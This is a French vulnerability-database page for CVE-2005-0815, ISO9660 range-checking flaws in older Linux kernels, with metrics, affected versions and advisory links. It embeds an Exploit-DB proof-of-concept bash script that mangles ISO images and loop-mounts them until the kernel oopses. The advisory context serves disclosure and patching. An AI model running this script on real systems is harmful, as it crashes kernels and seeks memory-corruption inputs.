CVE-2005-0815 : Détail

CVE-2005-0815

0.31%V3
Network
2005-03-20 04:00 +00:00
2017-10-09 22:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

Multiple "range checking flaws" in the ISO9660 filesystem handler in Linux 2.6.11 and earlier may allow attackers to cause a denial of service or corrupt memory via a crafted filesystem.

Informations

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 6.4 AV:N/AC:L/Au:N/C:N/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 25234

Date de publication : 2005-03-16 23:00 +00:00
Auteur : Michal Zalewski
EDB Vérifié : Yes

# source: https://www.securityfocus.com/bid/12837/info # # The Linux kernel is reported prone to multiple vulnerabilities that occur because of "range-checking flaws" present in the ISO9660 handling routines. # # An attacker may exploit these issues to trigger kernel-based memory corruption. Ultimately, the attacker may be able to execute arbitrary malicious code with ring-zero privileges. # # These vulnerabilities are reported to be present in the ISO9660 filesystem handler including Rock Ridge and Juliet extensions for the Linux kernel up to and including version 2.6.11. # #!/bin/bash cd /tmp || exit 1 echo '[*] Compiling mangler...' cat >mangle.c <<_EOF_ char buf[10240]; main() { int i,x; srand(time(0) ^ getpid()); while ( (i = read(0,buf,sizeof(buf))) > 0) { x = rand() % (i/20); while (x--) buf[rand() % i] = rand(); write(1,buf,i); } } _EOF_ gcc -O3 mangle.c -o mangle || exit 1 rm -f mangle.c echo '[*] Preparing ISO master (feel free to alter this code)...' mkdir cd_dir || exit 1 cd cd_dir CNT=0 while [ "$CNT" -lt "200" ]; do mkdir A; cd A CNT=$[CNT+1] done cd /tmp/cd_dir A=`perl -e '{print "A"x255}' 2>/dev/null` CNT=0 while [ "$CNT" -lt "3" ]; do mkdir "$A"; cd "$A" CNT=$[CNT+1] done cd /tmp echo '[*] Creating image (alter filesystem or parameters as needed)...' mkisofs -U -R -J -o cd.iso cd_dir 2>/dev/null || exit 1 rm -rf cd_dir echo '[*] STRESS TEST PHASE...' while :; do DIR="/tmp/cdtest-$$-$RANDOM" mkdir "$DIR" dmesg -c 2>/dev/null cat cd.iso | ./mangle >cd_mod.iso mount -t iso9660 -o loop,ro /tmp/cd_mod.iso "$DIR" 2>/dev/null # ls -lAR "$DIR" - Uncomment if you like when it HURTS... umount "$DIR" 2>/dev/null rm -rf "$DIR" 2>/dev/null FAULT=`dmesg | grep -Ei 'oops|unable to handle'` test "$FAULT" = "" || break done dmesg | tail -30 echo '[+] Something found (/tmp/cd-mod.iso)...' rm -f cd.iso mangle exit 0

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.0

Linux>>Linux_kernel >> Version 2.0.1

Linux>>Linux_kernel >> Version 2.0.2

Linux>>Linux_kernel >> Version 2.0.3

Linux>>Linux_kernel >> Version 2.0.4

Linux>>Linux_kernel >> Version 2.0.5

Linux>>Linux_kernel >> Version 2.0.6

Linux>>Linux_kernel >> Version 2.0.7

Linux>>Linux_kernel >> Version 2.0.8

Linux>>Linux_kernel >> Version 2.0.9

Linux>>Linux_kernel >> Version 2.0.9.9

Linux>>Linux_kernel >> Version 2.0.10

Linux>>Linux_kernel >> Version 2.0.11

Linux>>Linux_kernel >> Version 2.0.12

Linux>>Linux_kernel >> Version 2.0.13

Linux>>Linux_kernel >> Version 2.0.14

Linux>>Linux_kernel >> Version 2.0.15

Linux>>Linux_kernel >> Version 2.0.16

Linux>>Linux_kernel >> Version 2.0.17

Linux>>Linux_kernel >> Version 2.0.18

Linux>>Linux_kernel >> Version 2.0.19

Linux>>Linux_kernel >> Version 2.0.20

Linux>>Linux_kernel >> Version 2.0.21

Linux>>Linux_kernel >> Version 2.0.22

Linux>>Linux_kernel >> Version 2.0.23

Linux>>Linux_kernel >> Version 2.0.24

Linux>>Linux_kernel >> Version 2.0.25

Linux>>Linux_kernel >> Version 2.0.26

Linux>>Linux_kernel >> Version 2.0.27

Linux>>Linux_kernel >> Version 2.0.28

Linux>>Linux_kernel >> Version 2.0.29

Linux>>Linux_kernel >> Version 2.0.30

Linux>>Linux_kernel >> Version 2.0.31

Linux>>Linux_kernel >> Version 2.0.32

Linux>>Linux_kernel >> Version 2.0.33

Linux>>Linux_kernel >> Version 2.0.34

Linux>>Linux_kernel >> Version 2.0.35

Linux>>Linux_kernel >> Version 2.0.36

Linux>>Linux_kernel >> Version 2.0.37

Linux>>Linux_kernel >> Version 2.0.38

Linux>>Linux_kernel >> Version 2.0.39

Linux>>Linux_kernel >> Version 2.1

Linux>>Linux_kernel >> Version 2.1.89

Linux>>Linux_kernel >> Version 2.2.0

Linux>>Linux_kernel >> Version 2.2.1

Linux>>Linux_kernel >> Version 2.2.2

Linux>>Linux_kernel >> Version 2.2.3

Linux>>Linux_kernel >> Version 2.2.4

Linux>>Linux_kernel >> Version 2.2.5

Linux>>Linux_kernel >> Version 2.2.6

Linux>>Linux_kernel >> Version 2.2.7

Linux>>Linux_kernel >> Version 2.2.8

Linux>>Linux_kernel >> Version 2.2.9

Linux>>Linux_kernel >> Version 2.2.10

Linux>>Linux_kernel >> Version 2.2.11

Linux>>Linux_kernel >> Version 2.2.12

Linux>>Linux_kernel >> Version 2.2.13

Linux>>Linux_kernel >> Version 2.2.14

Linux>>Linux_kernel >> Version 2.2.15

Linux>>Linux_kernel >> Version 2.2.15

Linux>>Linux_kernel >> Version 2.2.15_pre20

    Linux>>Linux_kernel >> Version 2.2.16

    Linux>>Linux_kernel >> Version 2.2.16

    Linux>>Linux_kernel >> Version 2.2.17

    Linux>>Linux_kernel >> Version 2.2.18

    Linux>>Linux_kernel >> Version 2.2.19

    Linux>>Linux_kernel >> Version 2.2.20

    Linux>>Linux_kernel >> Version 2.2.21

    Linux>>Linux_kernel >> Version 2.2.22

    Linux>>Linux_kernel >> Version 2.2.23

    Linux>>Linux_kernel >> Version 2.2.24

    Linux>>Linux_kernel >> Version 2.2.25

    Linux>>Linux_kernel >> Version 2.2.27

    Linux>>Linux_kernel >> Version 2.3.0

    Linux>>Linux_kernel >> Version 2.3.99

    Linux>>Linux_kernel >> Version 2.3.99

    Linux>>Linux_kernel >> Version 2.3.99

    Linux>>Linux_kernel >> Version 2.3.99

    Linux>>Linux_kernel >> Version 2.3.99

    Linux>>Linux_kernel >> Version 2.3.99

    Linux>>Linux_kernel >> Version 2.3.99

    Linux>>Linux_kernel >> Version 2.3.99

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.0

    Linux>>Linux_kernel >> Version 2.4.1

    Linux>>Linux_kernel >> Version 2.4.2

    Linux>>Linux_kernel >> Version 2.4.3

    Linux>>Linux_kernel >> Version 2.4.3

    Linux>>Linux_kernel >> Version 2.4.4

    Linux>>Linux_kernel >> Version 2.4.5

    Linux>>Linux_kernel >> Version 2.4.6

    Linux>>Linux_kernel >> Version 2.4.7

    Linux>>Linux_kernel >> Version 2.4.8

    Linux>>Linux_kernel >> Version 2.4.9

    Linux>>Linux_kernel >> Version 2.4.10

    Linux>>Linux_kernel >> Version 2.4.11

    Linux>>Linux_kernel >> Version 2.4.12

    Linux>>Linux_kernel >> Version 2.4.13

    Linux>>Linux_kernel >> Version 2.4.14

    Linux>>Linux_kernel >> Version 2.4.15

    Linux>>Linux_kernel >> Version 2.4.16

    Linux>>Linux_kernel >> Version 2.4.17

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.18

      Linux>>Linux_kernel >> Version 2.4.19

      Linux>>Linux_kernel >> Version 2.4.19

      Linux>>Linux_kernel >> Version 2.4.19

      Linux>>Linux_kernel >> Version 2.4.19

      Linux>>Linux_kernel >> Version 2.4.19

      Linux>>Linux_kernel >> Version 2.4.19

      Linux>>Linux_kernel >> Version 2.4.19

      Linux>>Linux_kernel >> Version 2.4.20

      Linux>>Linux_kernel >> Version 2.4.21

      Linux>>Linux_kernel >> Version 2.4.21

      Linux>>Linux_kernel >> Version 2.4.21

      Linux>>Linux_kernel >> Version 2.4.21

      Linux>>Linux_kernel >> Version 2.4.22

      Linux>>Linux_kernel >> Version 2.4.22

      Linux>>Linux_kernel >> Version 2.4.23

      Linux>>Linux_kernel >> Version 2.4.23

      Linux>>Linux_kernel >> Version 2.4.23_ow2

        Linux>>Linux_kernel >> Version 2.4.24

        Linux>>Linux_kernel >> Version 2.4.24_ow1

          Linux>>Linux_kernel >> Version 2.4.25

          Linux>>Linux_kernel >> Version 2.4.26

          Linux>>Linux_kernel >> Version 2.4.27

          Linux>>Linux_kernel >> Version 2.4.27

          Linux>>Linux_kernel >> Version 2.4.27

          Linux>>Linux_kernel >> Version 2.4.27

          Linux>>Linux_kernel >> Version 2.4.27

          Linux>>Linux_kernel >> Version 2.4.27

          Linux>>Linux_kernel >> Version 2.4.28

          Linux>>Linux_kernel >> Version 2.4.29

          Linux>>Linux_kernel >> Version 2.4.29

          Linux>>Linux_kernel >> Version 2.4.29

          Linux>>Linux_kernel >> Version 2.4.30

          Linux>>Linux_kernel >> Version 2.4.30

          Linux>>Linux_kernel >> Version 2.4.30

          Linux>>Linux_kernel >> Version 2.4.31

          Linux>>Linux_kernel >> Version 2.5.0

          Linux>>Linux_kernel >> Version 2.5.1

          Linux>>Linux_kernel >> Version 2.5.2

          Linux>>Linux_kernel >> Version 2.5.3

          Linux>>Linux_kernel >> Version 2.5.4

          Linux>>Linux_kernel >> Version 2.5.5

          Linux>>Linux_kernel >> Version 2.5.6

          Linux>>Linux_kernel >> Version 2.5.7

          Linux>>Linux_kernel >> Version 2.5.8

          Linux>>Linux_kernel >> Version 2.5.9

          Linux>>Linux_kernel >> Version 2.5.10

          Linux>>Linux_kernel >> Version 2.5.11

          Linux>>Linux_kernel >> Version 2.5.12

          Linux>>Linux_kernel >> Version 2.5.13

          Linux>>Linux_kernel >> Version 2.5.14

          Linux>>Linux_kernel >> Version 2.5.15

          Linux>>Linux_kernel >> Version 2.5.16

          Linux>>Linux_kernel >> Version 2.5.17

          Linux>>Linux_kernel >> Version 2.5.18

          Linux>>Linux_kernel >> Version 2.5.19

          Linux>>Linux_kernel >> Version 2.5.20

          Linux>>Linux_kernel >> Version 2.5.21

          Linux>>Linux_kernel >> Version 2.5.22

          Linux>>Linux_kernel >> Version 2.5.23

          Linux>>Linux_kernel >> Version 2.5.24

          Linux>>Linux_kernel >> Version 2.5.25

          Linux>>Linux_kernel >> Version 2.5.26

          Linux>>Linux_kernel >> Version 2.5.27

          Linux>>Linux_kernel >> Version 2.5.28

          Linux>>Linux_kernel >> Version 2.5.29

          Linux>>Linux_kernel >> Version 2.5.30

          Linux>>Linux_kernel >> Version 2.5.31

          Linux>>Linux_kernel >> Version 2.5.32

          Linux>>Linux_kernel >> Version 2.5.33

          Linux>>Linux_kernel >> Version 2.5.34

          Linux>>Linux_kernel >> Version 2.5.35

          Linux>>Linux_kernel >> Version 2.5.36

          Linux>>Linux_kernel >> Version 2.5.37

          Linux>>Linux_kernel >> Version 2.5.38

          Linux>>Linux_kernel >> Version 2.5.39

          Linux>>Linux_kernel >> Version 2.5.40

          Linux>>Linux_kernel >> Version 2.5.41

          Linux>>Linux_kernel >> Version 2.5.42

          Linux>>Linux_kernel >> Version 2.5.43

          Linux>>Linux_kernel >> Version 2.5.44

          Linux>>Linux_kernel >> Version 2.5.45

          Linux>>Linux_kernel >> Version 2.5.46

          Linux>>Linux_kernel >> Version 2.5.47

          Linux>>Linux_kernel >> Version 2.5.48

          Linux>>Linux_kernel >> Version 2.5.49

          Linux>>Linux_kernel >> Version 2.5.50

          Linux>>Linux_kernel >> Version 2.5.51

          Linux>>Linux_kernel >> Version 2.5.52

          Linux>>Linux_kernel >> Version 2.5.53

          Linux>>Linux_kernel >> Version 2.5.54

          Linux>>Linux_kernel >> Version 2.5.55

          Linux>>Linux_kernel >> Version 2.5.56

          Linux>>Linux_kernel >> Version 2.5.57

          Linux>>Linux_kernel >> Version 2.5.58

          Linux>>Linux_kernel >> Version 2.5.59

          Linux>>Linux_kernel >> Version 2.5.60

          Linux>>Linux_kernel >> Version 2.5.61

          Linux>>Linux_kernel >> Version 2.5.62

          Linux>>Linux_kernel >> Version 2.5.63

          Linux>>Linux_kernel >> Version 2.5.64

          Linux>>Linux_kernel >> Version 2.5.65

          Linux>>Linux_kernel >> Version 2.5.66

          Linux>>Linux_kernel >> Version 2.5.67

          Linux>>Linux_kernel >> Version 2.5.68

          Linux>>Linux_kernel >> Version 2.5.69

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.0

          Linux>>Linux_kernel >> Version 2.6.1

          Linux>>Linux_kernel >> Version 2.6.1

          Linux>>Linux_kernel >> Version 2.6.1

          Linux>>Linux_kernel >> Version 2.6.10

          Linux>>Linux_kernel >> Version 2.6.10

          Linux>>Linux_kernel >> Version 2.6.11

          Linux>>Linux_kernel >> Version 2.6_test9_cvs

            References

            http://secunia.com/advisories/18684
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.redhat.com/support/errata/RHSA-2005-366.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.securityfocus.com/bid/12837
            Tags : vdb-entry, x_refsource_BID
            http://www.redhat.com/support/errata/RHSA-2006-0190.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.securityfocus.com/archive/1/393590
            Tags : mailing-list, x_refsource_BUGTRAQ
            http://secunia.com/advisories/17002
            Tags : third-party-advisory, x_refsource_SECUNIA
            https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=152532
            Tags : vendor-advisory, x_refsource_FEDORA
            http://www.mandriva.com/security/advisories?name=MDKSA-2006:072
            Tags : vendor-advisory, x_refsource_MANDRIVA
            http://www.redhat.com/support/errata/RHSA-2005-663.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.vupen.com/english/advisories/2005/1878
            Tags : vdb-entry, x_refsource_VUPEN
            http://www.redhat.com/support/errata/RHSA-2006-0191.html
            Tags : vendor-advisory, x_refsource_REDHAT
            Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.